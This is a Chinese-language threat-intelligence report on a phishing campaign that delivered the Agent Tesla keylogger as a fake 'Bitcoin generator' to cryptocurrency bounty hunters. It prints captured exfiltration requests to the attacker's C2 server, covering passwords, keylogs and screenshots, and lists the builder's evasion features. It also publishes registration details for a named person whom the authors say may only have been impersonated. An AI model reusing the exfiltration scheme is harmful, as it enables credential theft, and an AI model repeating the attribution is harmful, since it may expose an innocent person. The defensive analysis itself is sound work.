Facebook加入
LINE加入
2021/12/25
羊毛黨,指關注與熱衷於「薅羊毛」的群體,是指那些專門選擇企業的營銷活動、廣告投放等,以低成本甚至零成本來換取高額獎勵的人。早期網站站上利用虛假點擊來獲取廣告受益,到現在利用各種營銷機制漏洞、程序漏洞來「薅」企業推廣的費用的兩類群體,本文都統稱為「羊毛黨」。
比特幣,英語Bitcoin,是一種全球通用的互聯網加密數字貨幣,與傳統的由特定機構發行或控制的中心化虛擬貨幣不同,比特幣採用點對點網路開發的區塊鏈技術,具有去中心化、匿名不易追蹤的特點,因此很多黑客利用比特幣逃避交易跟蹤,比如wannacry等總眾多勒索軟體作者。
當比特幣作為新興電子資產被越來越多的人了解和使用時,熱愛新鮮事物的羊毛黨們靠著敏銳的嗅覺也開始推陳出新,一邊利用比特幣來進行交易逃避監管,一邊利用各種「薅羊毛」方式來賺取比特幣積累財富。然而,在這個行業繁榮的背後,隱藏著另一神秘的群體,如同太極里的陰陽,有光明必有黑暗,有繁榮必有摧毀繁榮,這個神秘的群體寄居在「羊毛黨」之上,貪婪地薅著同樣貪婪地「羊毛黨」的羊毛。
近期,東巽科技2046Lab利用東巽威脅情報中心的全球C2(也稱C&C,Command and Control Server縮寫,指木馬的控制和命令伺服器)監控平台,就跟蹤到這樣一批神秘群體。
東巽的全球C2監控平台,實時監控著採集到的全球C2的存活狀態。2046Lab的安全研究員通過演算法,在監控結果中發現了一批非常相似類型C2上線。通過對這些C2進行深入跟蹤分析后,發現了一些有趣的現象,某個C2區區幾百個受害者,但被竊取的帳號密碼卻有近十萬對,如下圖。據此,我們推測這些受害者應該不是普通的網民,於是對整個C2、受害者和攻擊者進行了全面深入的分析。
圖 C2控制中心截圖
C2與木馬分析2.1 C2與釣魚頁面本次發現的C2主要位於域名a-work.info下,該域名下有3個C2,且登陸界面一樣,基本斷定三個C2屬於同一個組織操控,並攻擊了不少受害者,如下表。
| C2 | 受害者總量 | 密碼總量 | logger總量 |
| 322 | 92530 | 16213 | |
| 243 | 49954 | 3930 | |
| 80 | 10487 | - |
攻擊者是如何攻下這些受害者?我們通過跟蹤分析發現,攻擊者製造了非常精美的比特幣相關釣魚頁面,並託管在和兩個地址,引誘受害者下載釣魚頁面提供的「比特幣生成器」,如下圖。
圖 「比特幣生成器」釣魚網頁
然而,這款「比特幣生成器」實際上是一個名為Agent Tesla的Keylogger類型木馬,其功能主要有竊取瀏覽器、郵件、FTP等密碼,收集鍵盤記錄、粘貼板信息,獲取截屏和網路攝像頭。受害者一旦被植入該木馬,則會將上述密碼、信息發送到a-work.info下某個C2控制中心。
2.2 木馬流量分析安全研究員從上述釣魚頁面下載了所謂的「比特幣生成器」,運行後進行了流量分析。在捕獲的數據包中,可以明顯的看到木馬連回a-work.info站點,如下圖。
圖 木馬執行后回連C2
同時,捕獲到以下數據包:
1、發送受害者基本信息到伺服器,關鍵參數為type=info,其他hwid為唯一編號,pcname為用戶名和計算機名稱。
POST /steamx/post.php HTTP/1.1Host: a-work.infoUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Length: 157Content-Type: application/x-www-form-urlencodedExpect: 100-continueX-Lantern-Version: 3.7.4Accept-Encoding: gzip type=info&hwid=FCE7-4911-DBB4-64F8-E31F-B2BB-8084-F2C8&time=2017-07-28 10:43:52&pcname=Administrator/i-3511je5j&logdata=&screen=&ipadd=&webcam_link=&client=&link=&username=&password=&screen_link=2、每隔2分鐘發送一次心跳包,關鍵參數為type=update。
type=update&hwid=FCE7-4911-DBB4-64F8-E31F-B2BB-8084-F2C8&time=2017-07-28 10:54:06&pcname=Administrator/i-3511je5j&logdata=&screen=&ipadd=&webcam_link=&client=&link=&username=&password=&screen_link=3、發送屏幕截圖,關鍵參數為type=screenshots,數據欄位為screen,截圖數據數據量較大,內容用{$data}代替。
type=screenshots&hwid=FCE7-4911-DBB4-64F8-E31F-B2BB-8084-F2C8&time=2017-07-28 11:04:06&pcname=Administrator/i-3511je5j&logdata=&screen={$data}&ipadd=&webcam_link=&client=&link=&username=&password=&screen_link=4 、發送鍵盤記錄和粘貼板記錄,關鍵參數為type=keylog,數據欄位為logdata,內容較多用{$data}代替。
type=keylog&hwid=FCE7-4911-DBB4-64F8-E31F-B2BB-8084-F2C8&time=2017-07-28 11:04:06&pcname=Administrator/i-3511je5j&logdata={$data}&screen=&ipadd=&webcam_link=&client=&link=&username=&password=&screen_link=5、發送竊取的密碼,關鍵欄位為type=passwords,數據欄位為username和password,內容較多用較多用{$data}代替。
type=passwords&hwid=FCE7-4911-DBB4-64F8-E31F-B2BB-8084-F2C8&time=2017-07-28 11:04:06&pcname=Administrator/i-3511je5j&logdata=&screen=&ipadd=&webcam_link=&client=&link=&username=&password={$data}&screen_link=綜合以上數據可以看到,木馬的流量中關鍵指令為type=info/update/screenshots/keylog/passwords,每一次通信過程中,數據欄位都有hwid、pcname、logdata、screen、ipadd、webcam_link、client、link、username、password、screen_link,網關類的設備可以此為基礎來生成檢測和阻斷規則。
2.3 木馬行為分析安全研究員同時對木馬運行后的行為進行了分析,捕獲到以下木馬特徵行為:
1、木馬啟動后偽造報錯信息並複製自身到C:\Users\當前用戶\AppData\Local\Temp目錄,然後自刪除。
圖 釋放文件
2、修改註冊表,並將自己添加到啟動項中。
根據木馬的行為分析來看,這款木馬還是具有很明顯的木馬特徵,按道理很多殺軟應該可以輕易的查殺,但為什麼還是有不少受害者中招,抱著這個好奇心以及本著透徹分析的原則,東巽2046Lab的安全研究員對木馬的生成器進行了分析。由於沒有捕獲到本次攻擊者使用的生成器,考慮到和官方的生成器存在一致性,便對官方的生成器進行分析做參考。
Agent tesla是一款市面上公開的keylogger類型木馬,其官網為,如下圖。透過官網可以看到,頁面做得非常專業,提供木馬的同時提供web panel管理頁面和私有加密;支持全系列Windows系統;服務也是非常周到,提供自動購買、激活和7x24小時的支持,可以算是達到了SasS行業的標準。
安全研究員對生成器的分析結果如下:
1、木馬支持WEB、FTP、郵件三種數據接收方式,很明顯本次跟蹤到的C2採用了web接收方式。
2、木馬的記錄器(LOGGER)功能可進行任意配置,如鍵盤記錄、粘貼板記錄、截屏、攝像頭拍照,正好印證了木馬流量分析結果。
3、木馬竊取密碼種類繁多,幾乎涵蓋了主流的瀏覽器、郵件客戶端(連國內常用的foxmail都包含了)和一些ftp、Winscp等管理工具,並可以隨意配置。
4、木馬生成器的常見配置中還包括了安裝時bypass UAC,直接殺進程、禁用任務管理器、系統恢復等功能,甚至可配置運行后偽裝成提示、報錯等功能來迷惑受害者。
圖 安裝配置
3
3.1 行業分析如前述,根據受害者數量和密碼數量的比值,推測受害者不是普通網名。於是安全研究員將受害者的數據進行整理和統計,發現了更加有意思內容,大部分單個受害者的賬號和密碼數量都很大,甚至某單個受害的帳號密碼居然高達9510條。受害者是誰,做什麼行業需要大量的賬號和密碼?安全研究員對受害者賬號密碼對應的站點進行了統計,截取了總量前20的網站:
| 序號 | 網站 | 出現數量 |
| 1 | 599 | |
| 2 | 588 | |
| 3 | 414 | |
| 4 | 351 | |
| 5 | / | 308 |
| 6 | 307 | |
| 7 | 294 | |
| 8 | 283 | |
| 9 | 279 | |
| 10 | 279 | |
| 11 | 255 | |
| 12 | 254 | |
| 13 | 236 | |
| 14 | 235 | |
| 15 | 230 | |
| 16 | 217 | |
| 17 | 214 | |
| 18 | 214 | |
| 19 | 213 | |
| 20 | 213 |
排除常見的郵箱、社交站點外,安全研究員分析了靠前幾個站點。其中: (英語),註冊進去后發現這個網站功能齊全,包括投資、賭博、推廣等內容,經營行業橫跨金融理財、賭博、挖礦等行業。
圖 freebitco.in站點
https://freedoge.co.in/(英文),是一個免費獲取dogecoins(國內稱「狗幣」)的站點。
(俄語),是個雲挖礦類型的網站,靠售賣算力盈利,同時也提供推廣,返利按級別分別為20%,10%,3%,2%,1%。
圖 kapitalof.com站點
通過以上網站分析,受害者訪問多是和比特幣等虛擬幣相關的網站,結合木馬偽裝成「比特幣生成器」來看,我們認為受害者主要是跟虛擬貨幣相關的「羊毛黨」,從事SEO、廣告、挖礦、薅羊毛等網賺項目。
3.2 地域分析受害者共計645個,通過分析受害者的IP地理位置信息,發現受害者主要來自俄語系國家,其中又以俄羅斯為最為嚴重,佔到了近一半的比例,這也印證了上述站點中為何mail.ru排名靠前,且vk.com和yandex.ru等典型俄語系社交站點也靠前。
4
4.1 地域分析安全研究員對攻擊者進行了一定時間的跟蹤,根據跟蹤到的攻擊者的操作日誌提取到信息來看,攻擊者是有一定經驗的熟手,經常會利用VPN來管理C2。排除VPN后,綜合攻擊者使用的瀏覽器語言,推測攻擊者的真實IP可能為194.165.18.*,目前可能生活在俄羅斯,常使用VyprVPN來隱藏身份,母語為俄語。
C2的域名a-work.info存活時其IP指向185.28.102.63,隸屬於forpsicloud.sk雲服務商,位於捷克的一個機房中,說明攻擊者購買的是雲主機。這個網站的主要語言以俄語為主,符合上述攻擊者語言為俄語推斷。file-loader.download和uljob.info設置了域名隱私保護,但通過對a-work.info的Whois信息進行查詢,截取了以下重要信息:
Domain name: a-work.infoRegistrar URL: http://www.namecheap.com
Updated Date: 2017-07-30T04:49:51.00Z
Creation Date: 2017-02-13T09:34:23.00Z
Registrar Registration Expiration Date: 2018-02-13T09:34:23.00Z
Domain Status: clientTransferProhibited
Registrant Name: David Kazaryan
Registrant Organization:
Registrant Street: 1 Sovetskiy Pereylok
Registrant City: Chelkovo
Registrant State/Province: Moskovskaya obl
Registrant Postal Code: 121000
Registrant Country: RU
Registrant Phone: +7.9507287546
Registrant Email: [email protected]
Registry Admin ID: 3zb5xw53ltduhlgz
Admin Name: David Kazaryan
根據以上註冊人、註冊郵箱、電話等信息,進行了反查得到了其他幾個域名,整理后關係如下:
整理后詳細信息如下表:
Domaina-work.infodkazaryan.orgdkazaryan.info註冊人David KazaryanDavid KazaryanDavid KazaryanDavid Kazaryan註冊郵箱[email protected][email protected]註冊電話+7.9507287546+1.2482590389+1.2482590389+1.2482590389註冊國家RUUSUSUS創建時間2017-02-13T09:34:23Z 2017-01-22T04:52:27Z2017-01-22T04:19:16Z2017-01-22T04:19:12Z過期時間2018-02-13T09:34:23Z2019-01-22T04:52:27Z2018-01-22T04:19:16Z2018-01-22T04:19:12Z最近更新時間2017-07-30T04:49:51Z 2017-01-22T04:52:28Z2017-03-24T03:46:12Z2017-03-23T20:31:38Z供應商指向IP185.28.102.6350.63.202.3650.63.202.44184.168.221.46通過上述信息可以看到,所有的域名都指向名叫David Kazaryan的人,並且可以肯定的是:kazaryandavid.com、dkazaryan.org、dkazaryan.info一定隸屬於同一個人,理由是:
1) 註冊郵箱都是[email protected]。
2) 註冊電話都是+1.2482590389。
3) 註冊時間非常接近,都是2017-01-22 04點左右,甚至可以推測dkazaryan.org、dkazaryan.info是一次提交,選擇的兩個域名註冊申請,因為註冊時間、過期十分接近,其他信息完全一樣。
如果a-work.info和其他三個域名一樣,都是同一個人,那基本可以鎖定攻擊者的真實身份。於是我們通過社交站點找到了David Kazaryan這個人,如下圖。
從資料看,David Kazaryan是一名設計師,2012年從美國某大學大學部畢業,推算至今28歲左右,俄語流利。
同時,我們嘗試對[email protected]郵箱進行密碼找回,發現其附加的找回郵箱是隨意填寫的地址,除此之外,暫未找到其他與該郵箱有關信息,推測該郵箱可能是一個臨時申請郵箱。
綜合以上信息,從C2站點a-work.info的分析結果,我們推測攻擊者位置為俄羅斯,母語為俄語。雖然其註冊人為David Kazaryan,並且個人資料中俄語流利,但綜合來看更像美國人。考慮到我們暫未找到其與a-work.info其他交集的信息的情況下,雖然不能排除David Kazaryan([email protected])的嫌疑,但我們更傾向於認為攻擊者僅僅冒用了David Kazaryan這個名字。
4.3 時間線分析整理C2域名創建、釣魚網站域名創建和受害者數據日期統計后,得到下圖:
圖 部署和數據時間線
從圖可以看出,攻擊者在2月開始進行C2和釣魚站點域名申請和部署,3月開始投入使用,7月13日不管是受害者上線量,還是密碼和記錄器數據,都到達了數據頂峰(7月5日之前密碼和記錄器數據已被轉移),說明在7月中旬是攻擊者最活躍的時期。
4.4 意圖分析綜合以上信息:釣魚頁面為比特幣生成器頁面,木馬是一款密碼記錄器,受害者為SEO、挖礦等羊毛黨,且被竊取的數據多為比特幣錢包地址和密碼,再結合近半年比特幣行情飆升來看,可以斷定:攻擊者的意圖是盜取羊毛黨們的比特幣等虛擬貨幣資產,自己賺一筆。
總結從上述分析結果來看,本例C2完全定性為一起「黑產」事件,不過和以往見到的黑產不太一樣的是,這起黑產針對的是「羊毛黨」,略帶點「黑吃黑」的黑幫劇情。使用的技術不算高深,但依然有效,TTPs簡要總結如下:
表 TTPs總結
| 關鍵項 | 本次攻擊事件情況說明 |
| 主要攻擊目標 | SEO、挖礦、廣告聯盟等羊毛黨 |
| 目標國家 | 俄羅斯為主,以及周邊俄語系國家 |
| 關鍵作用點 | 個人PC電腦 |
| 攻擊手法 | 釣魚頁面->Agent telsa木馬 |
| 攻擊目的 | 竊取網站賬號和密碼,盜取比特幣等虛擬貨幣資產 |
| 漏洞使用情況 | 無 |
| 免殺技術 | 直接購買的定期更新的Agent telsa,本身具備較強的免殺和迷惑性 |
| 活躍程度 | 2月開始部署,3月開始投放並有上線,7月中旬達頂峰 |
| 反追蹤能力 | 有一定的跟蹤能力,利用vpn來訪問C2頁 |
| 攻擊源 | 位於俄羅斯(194.165.18.*)的俄語系攻擊者,有一定的可能性叫David Kazaryan。 |
此外,從這起事件來看,可以預見木馬即服務(MaSS)會越來越熱,黑產的上下游越來越清晰,也越來越專業,逐漸演變成一種標準化的軟體服務,致使攻擊變得更加簡單和低成本,攻擊者無須自行開發木馬,也無須私下聯繫木馬開發者,想要實施一次攻擊,只需要在互聯網上買一個月就好了。
所以,東巽科技建議用戶盡量不要下載使用來源不明的軟體和工具,尤其是破解、網賺一類,這些常常是木馬偽裝的重災區,當你在考慮輕鬆賺錢或者免費使用付費軟體的時候,也正是被攻擊者盯上的時候。如果你的數據資產很敏感很重要,建議加強網路安全方面的建設,並邀請專業的安全團隊進行定期的安全檢測。
註:
東巽全球C2監控平台,是東巽科技自研的一個全球C2的存活狀態的監控平台,用於監控C2的存活情況和分析攻擊者的活躍程度,為用戶提供威脅情報。
東巽2046Lab,是東巽科技的一個安全研究實驗室,主要從事樣本研究、異常流量研究、Web攻防研究、C2跟蹤等網路安全方面的研究。
完整報告請點擊閱讀原文
撰稿:2046Lab@東巽科技 編輯:唐學菲
【推薦閱讀】
熱門推薦
留言回覆
